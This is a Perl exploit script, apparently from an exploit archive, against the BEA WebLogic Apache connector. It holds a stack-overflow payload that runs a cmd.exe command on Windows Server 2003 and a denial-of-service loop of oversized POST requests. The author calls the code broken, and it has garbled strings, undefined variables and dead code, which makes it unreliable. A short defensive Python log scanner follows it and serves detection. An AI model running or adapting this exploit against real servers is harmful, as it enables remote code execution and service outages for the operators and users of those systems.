Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit

#// Bea Weblogic -- Apache Connector Remote Exploit -1day

#// Should stack break latest Windows Server 2003

#// BIG THANKS TO

#// "dong-hun you"(Xpl017Elz) in INetCop - for his paper

#// "Title: Advanced exploitation in exec-shield (Fedora Core case study)"

#// His technique works fine against Windows 2003 latest version.

#//

#// The code is broken, since I am chilling out for now

#// SKIDDI BULLETPROOF

#// You may fixup the DoS Code, Windows Code Works on English OSs

#// KingCope -- July/2008

use IO::Socket;

use strict;

$|=1;

my $apacheport = 80; #// Touch

###

my $wrongusage = 0;

my $dodoshost = 0;

###############################################################################

### Target List Entries |Operating System and Patch Level / Kernel Version|

###############################################################################

my @targets = ();

my @tgtname = ();

print "-" x 80;

$targets[0] = "1 Windows Server 2003 Enterprise Edition SP2 RC1 -- English\n";

$tgtname[0] = $targets[0];

$targets[100] = "2 Denial of Service\n";

$tgtname[100] = $targets[100];

###############################################################################

### Print Of Target List And Usage

###############################################################################

print "\n";

print "Bea Weblogic -- Apache Connector Remote Exploit\n\n";

print "Target List:\n";

foreach my $target (@targets) {

print $target;

}

print "\n\n";

print "-" x 80;

print "Usage: perl bea-unlock.pl ";

print "\n";

printusage:

if ($wrongusage == 1) { exit; }

################################################################################

### Argument Parsing

################################################################################

my $host = $ARGV[0];

my $target = $ARGV[1];

if (($host == "") || ($target == "")) {

$wrongusage = 1;

goto printusage;

}

################################################################################

### Setup Socket

################################################################################

setupsocket:

my $sock = IO::Socket::INET->new(PeerAddr => $host,

PeerPort => $apacheport,

Proto => 'tcp');

if ($dodoshost == 1) {

goto doshost;

}

################################################################################

### Select Target

################################################################################

if ($target == 1) {

print "Exploiting $host -- " . $tgtname[$target-1];

goto winexpl;

}

if ($target == 2) {

print "Attacking Host $host -- Denial of Service -- Wait ...\n";

goto doshost;

}

################################################################################

### Exploitation of Windows Versions

################################################################################

winexpl:

####WORKS [LOOKUP THE HOSTNAME]

my $command = "echo works > c:desiredfile.txt";

my $cmds = "cmd.exe /c "$command"|";

my $sc = $cmds;

#### STACKBREAKING WITH WINEXEC() ON WINDOWS

my $c = "C" x 97 . pack("L", 0x10013930) x 3 . pack("L", 0x10013930) . pack("L", 0x10013931) . pack("L",0x77EA411E);

my $a = $cmds . "A" x (4000-length($cmds)) . $c;

print $sock "POST /.jsp $arnHost: localhostrnrn";

while () {

print;

}

################################################################################

### Denial of Service Against The Apache Frontend Module For Bea Weblogic

################################################################################

####NEEDS SOME FIXUP

doshost:

$dodoshost = 1;

while

(1) {

$a = "A" x 6000;

goto setupsocket;

print $sock "POST /.jsp $arnrnHost: localhostrnrn";

while(read($sock,$_,100)) {

my $dosagain = 0;

if ($dosagain eq 1) {

"Server is down nown";

exit;

}

if ($_ =~ /Server/) {

print ".";

$dosagain = 1;

next;

}

}

}
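
A defender-side check for the request shape the script above sends, a `POST /.jsp` request line with a multi-kilobyte string where the HTTP version token belongs. This is an added example, not part of the original post. The log lines are constructed, and the function names and the 2048-byte threshold are assumptions.

```python
import re

# Apache common/combined log line: client, ident, user, [time], "request", status
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) '
)
VERSION_RE = re.compile(r"HTTP/\d\.\d")
MAX_REQUEST_LINE = 2048  # assumed alert threshold, tune per site


def classify(request_line):
    """Return the reasons a logged request line looks anomalous (empty if none)."""
    reasons = []
    if len(request_line) > MAX_REQUEST_LINE:
        reasons.append("oversized-request-line")
    parts = request_line.split(" ", 2)
    if len(parts) != 3:
        reasons.append("malformed-request-line")
    elif not VERSION_RE.fullmatch(parts[2]):
        # Third token must be the protocol version, not arbitrary filler.
        reasons.append("bad-version-token")
    return reasons


def scan(lines):
    """Return a list of (client, status, reasons) for every flagged log line."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the expected format
        reasons = classify(m.group("req"))
        if reasons:
            findings.append((m.group("src"), int(m.group("status")), reasons))
    return findings


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "POST /app/login.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [01/Jan/2024:10:00:05 +0000] "POST /.jsp ' + "A" * 4100 + '" 400 226 "-" "-"',
    '192.0.2.78 - - [01/Jan/2024:10:00:09 +0000] "POST /.jsp FOO" 400 226 "-" "-"',
    '192.0.2.11 - - [01/Jan/2024:10:00:12 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "-"',
]

if __name__ == "__main__":
    for src, status, reasons in scan(SAMPLE):
        print(src, status, ",".join(reasons))
```

Apache's `LimitRequestLine` directive caps the request-line length the server accepts, so it is the setting to review alongside this check.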
